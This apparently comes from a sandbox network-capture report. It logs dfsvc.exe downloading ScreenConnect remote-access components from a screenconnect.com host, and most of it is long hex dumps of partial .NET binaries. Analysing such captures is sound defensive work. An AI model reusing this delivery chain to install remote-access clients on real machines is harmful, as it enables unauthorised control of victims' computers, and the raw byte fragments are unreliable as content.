                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 28 15 04 00 06 2c 11 02 7b 06 01 00 04 7e 2c 02 00 0a 28 2d 02 00 0a 2a 16 2a 00 00 1b 30 05 00 ed 00 00 00 48 00 00 11 73 b4 04 00 06 0a 06 04 7d 6b 01 00 04 02 7b 03 01 00 04 0b 07 28 b8 00 00 0a 03 72 87 17 00 70 28 3d 00 00 2b 26 06 7b 6b 01 00 04 72 99 17 00 70 28 3e 00 00 2b 26 02 28 15 04 00 06 72 b7 17 00 70 18 28 2e 02 00 0a 26 02 28 da 00 00 0a 7d 05 01 00 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35
                                                                                                                                                                                                                                        Data Ascii: (,{~,(-**0Hs}k{(rp(=+&{krp(>+&(rp(.&(}~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 16 00 7d 04 21 1f 06 00 38 0e 98 1d 06 00 25 5d 3b 1f 06 00 07 81 40 1f 06 00 c9 77 58 04 06 00 13 5d 45 1f 06 00 41 83 7e 1d 06 00 a9 59 7e 1d 06 00 1d 5a 7e 1d 06 00 03 32 bc 10 06 00 3e 39 bc 10 06 00 94 7d 8a 1d 06 00 48 69 8a 1d 06 00 2b 76 7e 1d 06 00 61 76 7e 1d 06 00 36 30 2d 10 06 00 38 56 4a 1f 16 00 6a 38 4e 1f 16 00 76 38 4e 1f 36 00 56 0a 58 1f 16 00 e1 01 5d 1f 16 00 f6 03 6e 1f 16 00 30 07 7f 1f 16 00 ab 08 5d 1f 16 00 30 04 87 1f 16 00 4d 07 91 1f 16 00 01 00 9b 1f 16 00 3b 03 9b 1f 06 00 ce 72 a4 1f 06 00 69 5c b3 1d 06 00 ce 72 a4 1f 06 00 a5 75 a4 1d 01 00 e3 74 a9 1f 01 00 e5 59 bf 10 01 00 50 37 af 1f 36 00 56 0a b4 1f 16 00 8a 02 b9 1f 36 00 56 0a c5 1f 16 00 a0 00 b9 1f 36 00 56 0a fc 11 16 00 70 00 f2 11 16 00 94 03 68 12 06 00 12
                                                                                                                                                                                                                                        Data Ascii: }!8%];@wX]EA~Y~Z~2>9}Hi+v~av~60-8VJj8Nv8N6VX]n0]0M;ri\rutYP76V6V6Vph
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 00 00 e6 09 e5 10 6c 13 df 03 68 b1 00 00 00 00 86 08 57 12 b5 2b e0 03 a0 b1 00 00 00 00 86 08 75 12 b5 2b e1 03 d8 b1 00 00 00 00 86 08 b2 12 c1 2b e2 03 10 b2 00 00 00 00 86 08 cf 12 c1 2b e3 03 45 b2 00 00 00 00 81 00 96 12 cd 2b e4 03 5a b2 00 00 00 00 81 00 ef 12 d3 2b e6 03 00 00 00 00 00 00 c6 05 dc 6e b8 21 e8 03 00 00 00 00 00 00 c6 05 11 0c b1 04 e8 03 74 b2 00 00 00 00 c4 01 1e 2a db 2b e8 03 94 b2 00 00 00 00 94 00 7b 3e e5 2b e9 03 00 00 00 00 00 00 c4 05 42 64 ef 2b ea 03 37 b3 00 00 00 00 81 00 bc 71 ef 2b eb 03 58 b3 00 00 00 00 c4 00 58 10 e7 21 ec 03 a8 b9 00 00 00 00 81 00 81 2a f6 2b ed 03 10 ba 00 00 00 00 91 00 00 0f 05 2c f0 03 a8 ba 00 00 00 00 81 00 6a 09 15 2c f4 03 c8 ba 00 00 00 00 91 18 97 66 c0 20 f5 03 d4 ba 00 00 00 00 86
                                                                                                                                                                                                                                        Data Ascii: lhW+u+++E+Z+n!t*+{>+Bd+7q+XX!*+,j,f
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 2a 00 e8 2e 23 12 1a 00 9e 20 40 12 6b 00 b6 1c 41 12 6b 00 b6 1c 43 12 2a 00 e8 2e 43 12 1a 00 9e 20 63 12 2a 00 e8 2e 63 12 1a 00 9e 20 64 12 c2 05 b6 1c 81 12 22 00 7b 2f 81 12 6b 00 b6 1c a1 12 22 00 7b 2f a1 12 6b 00 b6 1c c1 12 6b 00 b6 1c e1 12 1a 00 e8 2e e1 12 6b 00 b6 1c 00 13 6b 00 b6 1c 01 13 1a 00 e8 2e 01 13 6b 00 b6 1c 20 13 6b 00 b6 1c 21 13 6b 00 b6 1c 41 13 6b 00 b6 1c 60 13 6b 00 b6 1c 61 13 1a 00 e8 2e 61 13 6b 00 b6 1c 80 13 6b 00 b6 1c a3 13 6b 00 b6 1c c3 13 6b 00 b6 1c e1 13 6b 00 b6 1c e3 13 6b 00 b6 1c 01 14 6b 00 b6 1c 03 14 6b 00 b6 1c 21 14 6b 00 b6 1c 41 14 6b 00 b6 1c 60 14 6b 00 b6 1c 61 14 6b 00 b6 1c 63 14 6b 00 b6 1c 81 14 6b 00 b6 1c 83 14 6b 00 b6 1c a0 14 6b 00 b6 1c a1 14 6b 00 b6 1c c1 14 6b 00 b6 1c c3 14 6b 00 b6
                                                                                                                                                                                                                                        Data Ascii: *.# @kAkC*.C c*.c d"{/k"{/kk.kk.k k!kAk`ka.akkkkkkkk!kAk`kakckkkkkkk
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 6e 49 44 00 67 65 74 5f 43 75 72 72 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 49 44 00 73 65 74 5f 43 75 72 72 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 49 44 00 63 75 72 72 65 6e 74 43 6f 6e 6e 65 63 74 69 6f 6e 49 44 00 63 6f 6e 6e 65 63 74 69 6f 6e 49 44 00 67 65 74 5f 54 69 6d 65 72 49 44 00 74 69 6d 65 72 49 44 00 67 65 74 5f 52 65 71 75 65 73 74 49 44 00 73 65 74 5f 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69
                                                                                                                                                                                                                                        Data Ascii: nIDget_CurrentConnectionIDset_CurrentConnectionIDcurrentConnectionIDconnectionIDget_TimerIDtimerIDget_RequestIDset_RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWri
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 74 72 6f 6c 50 61 6e 65 6c 48 65 6c 70 65 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 67 65 6e 65 72 61 74 65 50 61 72 74 69 63 69 70 61 6e 74 43 6f 6c 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 53 74 61 74 75 73 47 6c 79 70 68 42 6c 61 6e 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74
                                                                                                                                                                                                                                        Data Ascii: trolPanelHelper.pngScreenConnect.Properties.CommandRegenerateParticipantColor.pngScreenConnect.Properties.StatusGlyphBlankMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Propert
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 64 00 65 00 72 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 2f 53 00 65 00 6c 00 65 00 63 00 74 00 4d 00 69 00 63 00 72 00 6f 00 70 00 68 00 6f 00 6e 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 17 44 00 65 00 76 00 69 00 63 00 65 00 49 00 44 00 20 00 3d 00 20 00 00 2b 4d 00 75 00 74 00 65 00 4d 00 69 00 63 00 72 00 6f 00 70 00 68 00 6f 00 6e 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65
                                                                                                                                                                                                                                        Data Ascii: derCommand/SelectMicrophoneCommandDeviceID = +MuteMicrophoneCommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpe
                                                                                                                                                                                                                                        2024-12-20 17:22:56 UTC16384INData Raw: 69 6e 20 74 68 69 73 20 76 65 72 73 69 6f 6e 20 6f 66 20 79 6f 75 72 20 63 6f 6d 70 69 6c 65 72 2e 01 00 00 14 01 00 0f 52 65 71 75 69 72 65 64 4d 65 6d 62 65 72 73 00 00 05 01 00 02 00 00 0b 01 00 03 00 00 00 01 01 02 00 00 0a 01 00 02 00 00 00 02 01 00 00 0a 01 00 02 00 00 00 01 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 6d 01 00 05 00 00 00 10 57 61 69 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 15 53 74 61 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00
                                                                                                                                                                                                                                        Data Ascii: in this version of your compiler.RequiredMembersmWaitMillisecondsStartMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        9192.168.2.549763147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:22:58 UTC129OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 1726976
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.Windows.dll"; filename*=UTF-8''ScreenConnect.Windows.dll
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:22:58 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16049INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e e1 bd e7 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 52 1a 00 00 06 00 00 00 00 00 00 0a 71 1a 00 00 20 00 00 00 80 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 1a 00 00 02 00 00 c9 d5 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^" 0Rq @
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 00 10 00 00 16 28 00 02 00 0a 13 04 11 04 08 2d 07 7e 01 02 00 0a 2b 05 28 50 01 00 0a 73 16 01 00 0a 13 05 11 05 02 6f e4 01 00 0a de 18 11 05 2c 07 11 05 6f 11 00 00 0a dc 11 04 2c 07 11 04 6f 11 00 00 0a dc 08 2d 07 72 8d 05 00 70 2b 05 72 9d 05 00 70 08 2d 07 72 e9 05 00 70 2b 05 72 f1 05 00 70 17 8d 15 00 00 01 25 16 09 a2 28 02 02 00 0a 28 95 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 03 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 60 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 04 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00
                                                                                                                                                                                                                                        Data Ascii: (-~+(Pso,o,o-rp+rp-rp+rp%((((,o*4.s0*(~`(rqp((*0
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 01 00 0a 26 2b 0c 02 7b e3 00 00 04 6f 4b 03 00 0a 26 de 0f 26 02 7b e3 00 00 04 6f 4b 03 00 0a 26 de 00 2a 00 00 00 41 34 00 00 02 00 00 00 25 00 00 00 26 01 00 00 4b 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89 01 00 00 89 01 00 00 0f 00 00 00 15 00 00 01 1e 02 28 2e 00 00 0a 2a 13 30 07 00 36 00 00 00 88 00 00 11 02 7b 4c 03 00 0a 02 7b 4d 03 00 0a 02 7b 4e 03 00 0a 25 2d 16 26 02 02 fe 06 4f 03 00 0a 73 97 03 00 06 25 0a 7d 4e 03 00 0a 06 03 04 05 0e 04 6f 50 03 00 0a 2a 46 02 7b 51 03 00 0a 03 04 05 0e 04 28 cc 01 00 06 2a 82 02 7b 52 03 00 0a 28 53 03 00 0a 02 7b 54 03 00 0a 1f fc 02 7b 51 03 00 0a 28 c7 00 00 06 26 2a 1e 02 28 2e 00 00 0a 2a 96 02 7b eb 00 00 04 28 4a 02 00 06 2d 0b 16 8d de 00 00 01 28 cb 00 00 06 02 7b ec 00 00 04
                                                                                                                                                                                                                                        Data Ascii: &+{oK&&{oK&*A4%&K(.*06{L{M{N%-&Os%}NoP*F{Q(*{R(S{T{Q(&*(.*{(J-({
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 2f df 25 56 80 dc 24 df 25 56 80 1c 16 df 25 56 80 04 15 df 25 56 80 ce 2f df 25 56 80 97 2e df 25 56 80 a3 2e df 25 56 80 17 2f df 25 56 80 b4 2e df 25 06 00 19 61 c0 08 06 00 52 9c c1 25 06 00 8f 6f c1 25 06 00 d2 a6 c0 08 06 00 3a 6c c0 08 06 00 60 a7 c0 08 06 00 1e 3f 66 25 06 00 2f cb c0 08 06 00 69 cc c0 08 06 00 3f cb c0 08 06 00 79 cc c0 08 06 00 41 ba c0 08 06 00 8b 8c c0 08 06 00 c0 ba c0 08 06 00 a2 77 c0 08 06 00 19 61 c0 08 06 00 ad 6f e4 25 06 00 9e 56 e9 25 06 00 80 5b ee 25 06 00 da 18 c0 08 06 00 8b c7 b1 02 06 00 16 3a b1 02 06 00 22 3a b1 02 06 00 04 33 b1 02 06 00 c3 32 b1 02 06 00 8d 67 c0 08 06 00 c7 76 b1 02 06 06 90 31 c0 08 56 80 ae 1d e4 25 56 80 db 18 e4 25 56 80 35 20 e4 25 56 80 ae 1c e4 25 56 80 78 14 e4 25 56 80 93 1c e4 25
                                                                                                                                                                                                                                        Data Ascii: /%V$%V%V%V/%V.%V.%V/%V.%aR%o%:l`?f%/i?yAwao%V%[%:":32gv1V%V%V5 %V%Vx%V%
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: c6 3d 00 17 06 f0 a8 00 00 00 00 81 00 01 0e 01 00 17 06 0c a9 00 00 00 00 e1 09 b5 bf 9a 01 17 06 14 a9 00 00 00 00 e1 01 c1 b9 01 00 17 06 1b a9 00 00 00 00 e1 09 13 c1 4e 00 17 06 28 a9 00 00 00 00 e1 01 54 9a aa 39 17 06 7c a9 00 00 00 00 e1 01 bc 9b 64 00 17 06 00 00 00 00 03 00 86 18 20 9c c0 01 17 06 00 00 00 00 03 00 c6 01 88 47 b2 39 19 06 00 00 00 00 03 00 c6 01 83 47 b9 39 1c 06 00 00 00 00 03 00 c6 01 79 47 c6 39 21 06 84 a9 00 00 00 00 86 18 20 9c 01 00 22 06 8c a9 00 00 00 00 83 00 91 07 3d 00 22 06 00 00 00 00 03 00 86 18 20 9c c0 01 22 06 00 00 00 00 03 00 c6 01 88 47 76 39 24 06 00 00 00 00 03 00 c6 01 83 47 cd 39 26 06 00 00 00 00 03 00 c6 01 79 47 c6 39 2a 06 00 00 00 00 03 00 86 18 20 9c c0 01 2b 06 00 00 00 00 03 00 c6 01 88 47 7c 39
                                                                                                                                                                                                                                        Data Ascii: =N(T9|d G9G9yG9! "=" "Gv9$G9&yG9* +G|9
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: ce 4e 0b e9 03 7f ce 53 0b f1 03 20 9c 05 00 24 02 92 41 62 0b f1 03 ea 33 67 0b 39 06 88 a5 6d 0b a9 01 3e 60 77 0b e1 06 74 77 7d 0b e9 03 ea c1 83 0b e9 03 c6 17 8a 0b e1 02 d3 d3 90 0b 29 08 c1 66 9a 0b d1 07 55 7b a1 0b 31 08 f2 54 ac 0b a9 01 aa cd b1 0b f9 03 20 9c c8 0b 31 04 20 9c db 0b 19 04 20 9c 01 00 51 08 cf 83 02 0c 29 04 3e c1 08 0c 29 04 18 95 0e 0c 51 08 b5 94 14 0c 59 08 48 4d 1b 0c 21 04 20 9c 10 00 61 08 fa b3 3d 00 21 04 9d 74 22 0c 21 04 a1 5a 22 0c 69 08 b0 b3 29 0c e1 02 65 3d 34 0c e1 06 a7 b6 3a 0c 69 06 6d 6d 59 0c 2c 02 20 9c cf 00 69 06 3d 70 5e 0c 69 06 8c 6c 75 0c c4 01 20 9c 7d 01 69 06 97 0e 91 01 69 06 bf 12 92 0c 69 06 30 8a 97 0c 71 08 20 9c 10 00 3c 02 20 9c c0 01 71 06 1e 48 b8 0c 44 02 2e 60 3d 00 44 02 20 bc 49 00
                                                                                                                                                                                                                                        Data Ascii: NS $Ab3g9m>`wtw})fU{1T 1 Q)>)QYHM! a=!t"!Z"i)e=4:immY, i=p^ilu }iii0q < qHD.`=D I
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 09 89 02 87 09 97 00 c3 09 99 02 1e 09 9b 02 1e 09 9f 02 02 0a bb 02 87 09 71 00 a4 0a 62 00 e6 0a 71 00 f4 0a 72 00 0c 0b 54 01 fc 03 83 00 7b 0c 54 01 40 05 54 01 81 0c 83 00 85 0c 51 03 7b 0c bb 02 e0 0c 5b 03 17 0d 61 03 45 0d 93 00 45 0d 97 00 69 0d 7d 01 17 0d 69 03 e0 0d 77 03 0c 0e 79 03 0c 0e 81 03 40 05 83 03 40 05 b1 03 40 05 fb 03 8b 0f 11 04 40 05 9a 01 fc 03 9a 01 25 02 9c 01 25 01 53 04 25 02 5e 00 e2 10 97 00 1c 11 73 04 61 11 79 04 74 11 7f 04 6d 01 d1 04 ae 12 d1 04 ce 12 dd 04 40 05 6e 00 04 13 d1 04 42 13 07 05 40 05 0b 05 40 05 97 00 87 09 93 00 40 05 0f 05 40 05 77 03 88 13 83 00 b5 13 97 00 c8 13 1b 05 dd 13 7d 01 dd 13 21 05 ec 13 21 05 04 14 7f 00 71 14 1b 05 71 14 7d 01 71 14 0f 05 71 14 47 05 71 14 4b 05 71 14 93 00 71 14 4f 05
                                                                                                                                                                                                                                        Data Ascii: qbqrT{T@TQ{[aEEi}iwy@@@@%%S%^saytm@nB@@@@w}!!qq}qqGqKqqO
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 69 65 6c 64 00 3c 44 69 62 42 69 74 73 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 53 68 6f 75 6c 64 45 61 74 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 3c 4f 62 6a 65 63 74 3e 6b 5f 5f 42 61 63 6b 69 6e 67 46 69 65 6c 64 00 47 65 74 46 69 65 6c 64 00 46 69 78 65 64 45 6c 65 6d 65 6e 74 46 69 65 6c 64 00 69 64 43 68 69 6c 64 00 75 43 6d 64 00 70 69 53 68 6f 77 43 6d 64 00 47 65 74 53 68 6f 77 43 6d 64 00 53 65 74 53 68 6f 77 43 6d 64 00 73 68 6f 77 43 6d 64 00 68 57 6e 64 00 70 62 6c 65 6e 64 00 50 72 65 70 65 6e 64 00 41 70 70 65 6e 64 00 52 65 67 69 73 74 72 79 56 61 6c 75 65 4b 69 6e 64 00 55 72 69 4b 69 6e 64 00 67 65 74 5f 46 72 61 6d 65 73 50 65 72 53 65 63 6f 6e 64 00 64 77 42 79 74 65 73 50 65 72 53 65 63 6f 6e 64 00 68 77 6e 64
                                                                                                                                                                                                                                        Data Ascii: ield<DibBits>k__BackingField<ShouldEat>k__BackingField<Object>k__BackingFieldGetFieldFixedElementFieldidChilduCmdpiShowCmdGetShowCmdSetShowCmdshowCmdhWndpblendPrependAppendRegistryValueKindUriKindget_FramesPerSeconddwBytesPerSecondhwnd
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 53 44 69 73 63 6f 6e 6e 65 63 74 53 65 73 73 69 6f 6e 00 62 69 43 6f 6d 70 72 65 73 73 69 6f 6e 00 62 54 65 6d 70 6f 72 61 6c 43 6f 6d 70 72 65 73 73 69 6f 6e 00 42 69 74 6d 61 70 43 6f 6d 70 72 65 73 73 69 6f 6e 00 54 65 6d 70 6f 72 61 72 79 52 65 67 69 73 74 72 79 4d 6f 64 69 66 69 63 61 74 69 6f 6e 00 6d 61 67 6e 69 66 69 63 61 74 69 6f 6e 00 53 65 63 75 72 69 74 79 49 64 65 6e 74 69 66 69 63 61 74 69 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 47 65 74 4d 65 73 73 61 67 65 4d 6f 75 73 65 53 63 72 65 65 6e 4c 6f 63 61 74 69 6f 6e 00 47 65 74 49 63 6f 6e 4c 6f 63 61 74 69 6f 6e 00 53 65 74 49 63 6f 6e 4c 6f 63 61 74 69 6f 6e 00 53 65 63 75 72 69 74 79 44 65 6c 65 67 61 74 69 6f 6e 00 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 54 6f 6b 65 6e 49
                                                                                                                                                                                                                                        Data Ascii: SDisconnectSessionbiCompressionbTemporalCompressionBitmapCompressionTemporaryRegistryModificationmagnificationSecurityIdentificationApplicationGetMessageMouseScreenLocationGetIconLocationSetIconLocationSecurityDelegationGetCurrentProcessTokenI
                                                                                                                                                                                                                                        2024-12-20 17:22:59 UTC16384INData Raw: 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 55 72 69 3e 2e 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 41 70 70 44 6f 6d 61 69 6e 3e 2e 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 49 6e 74 50 74 72 3e 2e 43 75 72 72 65 6e 74 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 2e 49 45 6e 75 6d 65 72 61 74 6f 72 3c 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 2e 4d 61 6e 61 67 65 6d 65 6e 74 4f 62 6a 65 63 74
                                                                                                                                                                                                                                        Data Ascii: em.Collections.Generic.IEnumerator<System.Uri>.CurrentSystem.Collections.Generic.IEnumerator<System.AppDomain>.CurrentSystem.Collections.Generic.IEnumerator<System.IntPtr>.CurrentSystem.Collections.Generic.IEnumerator<System.Management.ManagementObject


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        10192.168.2.549781147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:23:03 UTC111OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC346INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 602392
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.WindowsClient.exe"; filename*=UTF-8''ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:23:03 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16038INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d9 9c 75 92 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 00 09 00 00 06 00 00 00 00 00 00 a6 19 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 31 63 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELu"0 @ `1c@
